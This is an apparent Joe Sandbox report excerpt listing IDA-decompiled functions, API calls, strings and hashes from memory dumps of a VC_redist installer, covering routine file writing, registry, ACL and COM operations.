                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 442123175-2381362037
                                                                          • Opcode ID: 5aa21b879edd6217e9eba9a0017b5f2c4fb64f877250542169ef980f149b2113
                                                                          • Instruction ID: b150b56fddbafc265ed04e6472b98c4a525fffe2ac2f9a3586bbcaba58151b41
                                                                          • Opcode Fuzzy Hash: 5aa21b879edd6217e9eba9a0017b5f2c4fb64f877250542169ef980f149b2113
                                                                          • Instruction Fuzzy Hash: 8E319E71A012199BDB64CF6ACC809DAB7F9FF88311F2484BAE50AD7250E730AD85CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004CC53 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E0004CC53(signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				intOrPtr _v5132;
				long _v5136;
				void* _v5140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				intOrPtr _t37;
				long _t45;
				char _t46;
				intOrPtr* _t49;
				void* _t50;
				void* _t54;
				void* _t57;
				char* _t59;
				long _t60;
				void* _t61;
				signed int* _t63;
				void* _t64;
				signed int _t65;

				E00059F00();
				_t31 =  *0x7a008; // 0xfbf51acb
				_v8 = _t31 ^ _t65;
				_t51 = _a8;
				_t49 = _a12;
				_t63 = _a4;
				_t54 =  *( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_t51 & 0x0000003f) * 0x30);
				 *_t63 =  *_t63 & 0x00000000;
				_t37 = _a16 + _t49;
				_t63[1] = _t63[1] & 0x00000000;
				_t63[2] = _t63[2] & 0x00000000;
				_v5140 = _t54;
				_v5132 = _t37;
				while(_t49 < _t37) {
					_t59 =  &_v5128;
					while(_t49 < _t37) {
						_t46 =  *_t49;
						_t49 = _t49 + 1;
						if(_t46 == 0xa) {
							_t63[2] = _t63[2] + 1;
							 *_t59 = 0xd;
							_t59 = _t59 + 1;
						}
						 *_t59 = _t46;
						_t59 = _t59 + 1;
						_t37 = _v5132;
						if(_t59 <  &_v9) {
							continue;
						}
						break;
					}
					_t60 = _t59 -  &_v5128;
					if(WriteFile(_t54,  &_v5128, _t60,  &_v5136, 0) == 0) {
						 *_t63 = GetLastError();
					} else {
						_t45 = _v5136;
						_t63[1] = _t63[1] + _t45;
						if(_t45 >= _t60) {
							_t37 = _v5132;
							_t54 = _v5140;
							continue;
						}
					}
					L12:
					_pop(_t61);
					_pop(_t64);
					_pop(_t50);
					return E0003DE36(_t50, _v8 ^ _t65, _t57, _t61, _t64);
				}
				goto L12;
			}



























                                                                          0x0004cc5d
                                                                          0x0004cc62
                                                                          0x0004cc69
                                                                          0x0004cc6c
                                                                          0x0004cc7b
                                                                          0x0004cc86
                                                                          0x0004cc8a
                                                                          0x0004cc91
                                                                          0x0004cc94
                                                                          0x0004cc96
                                                                          0x0004cc9a
                                                                          0x0004cc9e
                                                                          0x0004cca4
                                                                          0x0004cd11
                                                                          0x0004ccac
                                                                          0x0004ccb2
                                                                          0x0004ccb6
                                                                          0x0004ccb8
                                                                          0x0004ccbb
                                                                          0x0004ccbd
                                                                          0x0004ccc0
                                                                          0x0004ccc3
                                                                          0x0004ccc3
                                                                          0x0004ccc4
                                                                          0x0004ccc9
                                                                          0x0004cccc
                                                                          0x0004ccd2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004ccd2
                                                                          0x0004ccda
                                                                          0x0004ccf6
                                                                          0x0004cd1d
                                                                          0x0004ccf8
                                                                          0x0004ccf8
                                                                          0x0004ccfe
                                                                          0x0004cd03
                                                                          0x0004cd05
                                                                          0x0004cd0b
                                                                          0x00000000
                                                                          0x0004cd0b
                                                                          0x0004cd03
                                                                          0x0004cd1f
                                                                          0x0004cd24
                                                                          0x0004cd25
                                                                          0x0004cd28
                                                                          0x0004cd31
                                                                          0x0004cd31
                                                                          0x00000000

                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0004D18F,?,00000000,?,00000000,00000000), ref: 0004CCEE
                                                                          • GetLastError.KERNEL32(?,0004D18F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CD17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 442123175-2381362037
                                                                          • Opcode ID: be318af010b24304f273b67dee2d50aefe718dff5c9194982de54da26f2b7287
                                                                          • Instruction ID: 3a7f32b9f62f27294feac4bfd15b9cee0afc15d594dba1c5968adef9f01c4c30
                                                                          • Opcode Fuzzy Hash: be318af010b24304f273b67dee2d50aefe718dff5c9194982de54da26f2b7287
                                                                          • Instruction Fuzzy Hash: 7F21B175A002199FDB24CF69CC84BEAB7F8FB48342F1044BAE94AD7251D730AD85CB14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000139CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000139CF(void* __ecx, signed int* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* __edi;
				void* _t21;
				intOrPtr _t22;
				signed int _t24;
				void* _t30;
				signed int _t32;
				intOrPtr _t35;
				signed int _t44;
				signed int _t46;
				void* _t49;
				signed int _t51;
				void* _t53;

				_push(__ecx);
				_t46 = _a12;
				if(_t46 != 0) {
					_t51 = _a20;
					_t30 = _a16 + _t46;
					_t22 = E000138F6(_t21, __ecx, _a4, _t30, _t51, _a24);
					_v8 = _t22;
					if(_t22 >= 0) {
						_t44 =  *_a4;
						_t8 = _t30 - 1; // 0x5b48f
						_t24 = _t8;
						_t32 = _a8;
						_a20 = _t44;
						if(_t24 > _t32) {
							_a24 = _t24 * _t51 + _t44;
							_t12 = _t24 - 1; // 0x5b48e
							_t42 = _t12 * _t51 + _t44;
							_t35 = _a24;
							_t49 = _t24 - _t32;
							_a4 = _t12 * _t51 + _t44;
							do {
								E00031664(_t35, _t51, _t42, _t51);
								_t53 = _t53 + 0x10;
								_t42 = _a4 - _t51;
								_t35 = _t35 - _t51;
								_a4 = _a4 - _t51;
								_t49 = _t49 - 1;
							} while (_t49 != 0);
							_t46 = _a12;
							_t32 = _a8;
							_t44 = _a20;
						}
						E0003F670(_t46 * _t51, _t32 * _t51 + _t44, 0, _t46 * _t51);
						_t22 = _v8;
					}
				} else {
					_t22 = 0;
				}
				return _t22;
			}
















                                                                          0x000139d2
                                                                          0x000139d4
                                                                          0x000139d9
                                                                          0x000139ea
                                                                          0x000139ed
                                                                          0x000139f4
                                                                          0x000139f9
                                                                          0x000139fe
                                                                          0x00013a03
                                                                          0x00013a05
                                                                          0x00013a05
                                                                          0x00013a08
                                                                          0x00013a0b
                                                                          0x00013a10
                                                                          0x00013a19
                                                                          0x00013a1c
                                                                          0x00013a22
                                                                          0x00013a26
                                                                          0x00013a29
                                                                          0x00013a2b
                                                                          0x00013a2e
                                                                          0x00013a32
                                                                          0x00013a3a
                                                                          0x00013a3d
                                                                          0x00013a3f
                                                                          0x00013a41
                                                                          0x00013a44
                                                                          0x00013a44
                                                                          0x00013a49
                                                                          0x00013a4c
                                                                          0x00013a4f
                                                                          0x00013a4f
                                                                          0x00013a5e
                                                                          0x00013a63
                                                                          0x00013a66
                                                                          0x000139db
                                                                          0x000139db
                                                                          0x000139db
                                                                          0x00013a6f

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s
                                                                          • String ID: crypt32.dll$wininet.dll
                                                                          • API String ID: 2001391462-82500532
                                                                          • Opcode ID: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
                                                                          • Instruction ID: 522560e8100ade6fa540055e5737cbaa9ab37554ef224a376b0f8827d40bc2cf
                                                                          • Opcode Fuzzy Hash: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
                                                                          • Instruction Fuzzy Hash: 87115E71600219AFCF08DF69CDD69EFBF69EF98254B14812AFD094B311D631EA508AE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00051392 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E00051392(void* __ecx, void* __edx, void* _a4, short* _a8, char* _a12) {
				signed int _v8;
				signed short _t12;
				void* _t14;
				signed short _t18;
				signed short _t22;

				_t22 = 0;
				_v8 = _v8 & 0;
				if(_a12 == 0) {
					_t12 = RegDeleteValueW(_a4, _a8);
					if(_t12 == 2 || _t12 == 3) {
						_t12 = 0;
					}
					if(_t12 != 0) {
						_t26 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
						_t14 = 0x80004005;
						_t22 =  >=  ? 0x80004005 :  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
						_push(_t22);
						_push(0x2fe);
						goto L9;
					}
				} else {
					_t22 = E00050A2B(_a12, 0xffffffff,  &_v8);
					if(_t22 >= 0) {
						_t18 = RegSetValueExW(_a4, _a8, 0, 1, _a12, _v8);
						if(_t18 != 0) {
							_t29 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
							_t14 = 0x80004005;
							_t22 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
							_push(_t22);
							_push(0x2f5);
							L9:
							_push("regutil.cpp");
							E000137D3(_t14);
						}
					}
				}
				return _t22;
			}








                                                                          0x00051397
                                                                          0x00051399
                                                                          0x0005139f
                                                                          0x000513f5
                                                                          0x000513fe
                                                                          0x00051405
                                                                          0x00051405
                                                                          0x00051409
                                                                          0x00051416
                                                                          0x00051419
                                                                          0x00051420
                                                                          0x00051423
                                                                          0x00051424
                                                                          0x00000000
                                                                          0x00051424
                                                                          0x000513a1
                                                                          0x000513af
                                                                          0x000513b3
                                                                          0x000513c5
                                                                          0x000513cd
                                                                          0x000513da
                                                                          0x000513dd
                                                                          0x000513e4
                                                                          0x000513e7
                                                                          0x000513e8
                                                                          0x00051429
                                                                          0x00051429
                                                                          0x0005142e
                                                                          0x0005142e
                                                                          0x000513cd
                                                                          0x000513b3
                                                                          0x00051439

                                                                          APIs
                                                                          • RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                          • RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006,0A79F685,00020006,00020006,00000000,?,?,?), ref: 000513F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Delete
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 1738766685-955085611
                                                                          • Opcode ID: 19745d0869e0b933f38c049512af172f4472f6102fc504588220ba6c8902d11b
                                                                          • Instruction ID: 08cba929969813c259ca3b5793b2c522ca6a10626f04ea1e1668f65b4feacf42
                                                                          • Opcode Fuzzy Hash: 19745d0869e0b933f38c049512af172f4472f6102fc504588220ba6c8902d11b
                                                                          • Instruction Fuzzy Hash: 3211C636E00636BBEF215EA98C04FEB76E9EF04752F014221FE14EA1A0D775CD509AD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001DCA5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E0001DCA5(signed int _a4, short* _a8, intOrPtr _a12) {
				signed int _t15;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				short** _t26;
				void* _t27;

				_t15 = _a4;
				_t23 =  *((intOrPtr*)(_t15 + 0x8c));
				_t26 = 0;
				_t22 = 0;
				_t27 = 0x80070490;
				if(_t23 != 2) {
					if(_t23 == 3) {
						_t26 =  *(_t15 + 0x9c);
						_t22 =  *((intOrPtr*)(_t15 + 0xa0));
					}
				} else {
					_t26 =  *(_t15 + 0xb4);
					_t22 =  *((intOrPtr*)(_t15 + 0xb8));
				}
				_a4 = _a4 & 0x00000000;
				if(_t22 == 0) {
					L12:
					return _t27;
				} else {
					while(CompareStringW(0, 0,  *_t26, 0xffffffff, _a8, 0xffffffff) != 2) {
						_t26 =  &(_t26[3]);
						_t21 = _a4 + 1;
						_a4 = _t21;
						if(_t21 < _t22) {
							continue;
						}
						goto L12;
					}
					if(_a12 == 0) {
						L11:
						_t27 = 0;
						goto L12;
					}
					_t27 = E000121A5(_a12, _t26[1], 0);
					if(_t27 >= 0) {
						goto L11;
					}
					_push("Failed to copy the property value.");
					_push(_t27);
					E0005012F();
					goto L12;
				}
			}









                                                                          0x0001dca8
                                                                          0x0001dcae
                                                                          0x0001dcb4
                                                                          0x0001dcb6
                                                                          0x0001dcb8
                                                                          0x0001dcc0
                                                                          0x0001dcd3
                                                                          0x0001dcd5
                                                                          0x0001dcdb
                                                                          0x0001dcdb
                                                                          0x0001dcc2
                                                                          0x0001dcc2
                                                                          0x0001dcc8
                                                                          0x0001dcc8
                                                                          0x0001dce1
                                                                          0x0001dce7
                                                                          0x0001dd3c
                                                                          0x0001dd41
                                                                          0x0001dce9
                                                                          0x0001dce9
                                                                          0x0001dd04
                                                                          0x0001dd07
                                                                          0x0001dd08
                                                                          0x0001dd0d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001dd0f
                                                                          0x0001dd15
                                                                          0x0001dd39
                                                                          0x0001dd39
                                                                          0x00000000
                                                                          0x0001dd39
                                                                          0x0001dd24
                                                                          0x0001dd28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001dd2a
                                                                          0x0001dd2f
                                                                          0x0001dd30
                                                                          0x00000000
                                                                          0x0001dd36

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,0003744B,00000000,IGNOREDEPENDENCIES,00000000,?,0005B508), ref: 0001DCF6
                                                                          Strings
                                                                          • IGNOREDEPENDENCIES, xrefs: 0001DCAD
                                                                          • Failed to copy the property value., xrefs: 0001DD2A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                          • API String ID: 1825529933-1412343224
                                                                          • Opcode ID: 89dfa94a9367d36257226a35e88314fbb35a20e33dd47de9231b18416be4fbef
                                                                          • Instruction ID: 0fd6ca3e1fce107ae6ca528dc0aaac67a242d4d0d72da6cca32c7b9a89fd4e3f
                                                                          • Opcode Fuzzy Hash: 89dfa94a9367d36257226a35e88314fbb35a20e33dd47de9231b18416be4fbef
                                                                          • Instruction Fuzzy Hash: 0F11A076204215AFDB208F54DC85FEAB7A5FF58320F264676EA189B291C770A890C7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000554F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53sleepCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E000554F8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, long _a36) {
				char _v8;
				signed short _t16;
				char _t22;
				signed short _t25;

				_t22 = 0;
				_v8 = 0;
				_t16 = E000121A5( &_v8, _a4, 0);
				_t25 = _t16;
				if(_t25 < 0) {
					L8:
					if(_v8 != 0) {
						E000554EF(_v8);
					}
					return _t25;
				}
				_t25 = 0x80004005;
				while(_t22 <= _a32) {
					if(_t22 != 0) {
						Sleep(_a36);
					}
					__imp__SetNamedSecurityInfoW(_v8, _a8, _a12, _a16, _a20, _a24, _a28);
					_t25 =  <=  ? _t16 : _t16 & 0x0000ffff | 0x80070000;
					_t22 = _t22 + 1;
					if(_t25 < 0) {
						continue;
					} else {
						break;
					}
				}
				if(_t25 < 0) {
					E000137D3(_t16, "aclutil.cpp", 0x399, _t25);
				}
				goto L8;
			}







                                                                          0x000554fe
                                                                          0x00055507
                                                                          0x0005550b
                                                                          0x00055510
                                                                          0x00055514
                                                                          0x0005556f
                                                                          0x00055573
                                                                          0x00055578
                                                                          0x00055578
                                                                          0x00055584
                                                                          0x00055584
                                                                          0x00055516
                                                                          0x0005551b
                                                                          0x00055522
                                                                          0x00055527
                                                                          0x00055527
                                                                          0x00055542
                                                                          0x00055553
                                                                          0x00055556
                                                                          0x00055559
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055559
                                                                          0x0005555d
                                                                          0x0005556a
                                                                          0x0005556a
                                                                          0x00000000

                                                                          APIs
                                                                          • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00028C90,?,00000001,20000004,00000000,00000000,?,00000000), ref: 00055527
                                                                          • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00028C90,?), ref: 00055542
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InfoNamedSecuritySleep
                                                                          • String ID: aclutil.cpp
                                                                          • API String ID: 2352087905-2159165307
                                                                          • Opcode ID: 00034818d2381dd00d85cce22a1dbc05bd67710bf37b7a676018f8188f917c7c
                                                                          • Instruction ID: cacb0f36a974fc14feba22630c8eb41738aeac17181cb15242fe3267dec9950e
                                                                          • Opcode Fuzzy Hash: 00034818d2381dd00d85cce22a1dbc05bd67710bf37b7a676018f8188f917c7c
                                                                          • Instruction Fuzzy Hash: 5F018233800A28BBDF229E94CC15ECF7E6AEF84762F010115BE0566110E6328D60DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000255BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 000255D9
                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00025633
                                                                          Strings
                                                                          • Failed to initialize COM on cache thread., xrefs: 000255E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: Failed to initialize COM on cache thread.
                                                                          • API String ID: 3442037557-3629645316
                                                                          • Opcode ID: f9222d3066de48d4fbf7aabef0c9df53f99ed02a4f6eb38ae7da52cc17fc6c92
                                                                          • Instruction ID: 5870a2077fe7c0828b8ee542d00c8aeacc162f66c9475c9fe74bb62572023203
                                                                          • Opcode Fuzzy Hash: f9222d3066de48d4fbf7aabef0c9df53f99ed02a4f6eb38ae7da52cc17fc6c92
                                                                          • Instruction Fuzzy Hash: 43015B72600A19BFCB058BA5DC84DDAF7ADFF08355B408166FA08D7121DB31AE548B94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00053849
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005387C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 3ef6fecae5d4349b86fbc747aaad0bcade8918ee064f3dc3b1f012761a58eae5
                                                                          • Instruction ID: 8c94608af212b758de8fedea3c9df968aad659bf43fbdc9e19ccec6e3d6aa2de
                                                                          • Opcode Fuzzy Hash: 3ef6fecae5d4349b86fbc747aaad0bcade8918ee064f3dc3b1f012761a58eae5
                                                                          • Instruction Fuzzy Hash: 3C012675640315ABEB311A948C04FBB76D8DF407A2F008539FE05EB340CB78CE0597A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 000538D0
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00053903
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 516c67a5c7d574b4ea9049ce2e4c2f927ed145dc845df696af1a11444ff15dbb
                                                                          • Instruction ID: f4c1e805137ef62bfdaa835aee6644e3f3ec2f13884db7700f2212c7701b40d1
                                                                          • Opcode Fuzzy Hash: 516c67a5c7d574b4ea9049ce2e4c2f927ed145dc845df696af1a11444ff15dbb
                                                                          • Instruction Fuzzy Hash: 3701A275A40319BBEB314A948C08FBB77D8EF457A2F104025FD05AB240CBB8DE0457A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00053AC9(void* __ecx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int* _t24;
				void* _t27;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t24 = _a4;
				 *_t24 =  *_t24 & 0x00000000;
				_t27 = E00050E3F(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0x20019,  &_v8);
				if(_t27 != 0x80070002) {
					if(_t27 < 0) {
						L6:
						if(_v8 != 0) {
							RegCloseKey(_v8);
						}
						return _t27;
					}
					_t27 = E00050EEC(_t22, _v8, L"EnableLUA",  &_v12);
					if(_t27 == 0x80070002) {
						goto L1;
					}
					if(_t27 >= 0) {
						 *_t24 = 0 | _v12 != 0x00000000;
					}
					goto L6;
				}
				L1:
				_t27 = 0;
				goto L6;
			}







                                                                          0x00053ac9
                                                                          0x00053acc
                                                                          0x00053acd
                                                                          0x00053ace
                                                                          0x00053ad5
                                                                          0x00053adb
                                                                          0x00053ae9
                                                                          0x00053af6
                                                                          0x00053afe
                                                                          0x00053b06
                                                                          0x00053b31
                                                                          0x00053b35
                                                                          0x00053b3a
                                                                          0x00053b3a
                                                                          0x00053b47
                                                                          0x00053b47
                                                                          0x00053b19
                                                                          0x00053b21
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053b25
                                                                          0x00053b2f
                                                                          0x00053b2f
                                                                          0x00000000
                                                                          0x00053b25
                                                                          0x00053b00
                                                                          0x00053b00
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0005396A,?), ref: 00053B3A
                                                                          Strings
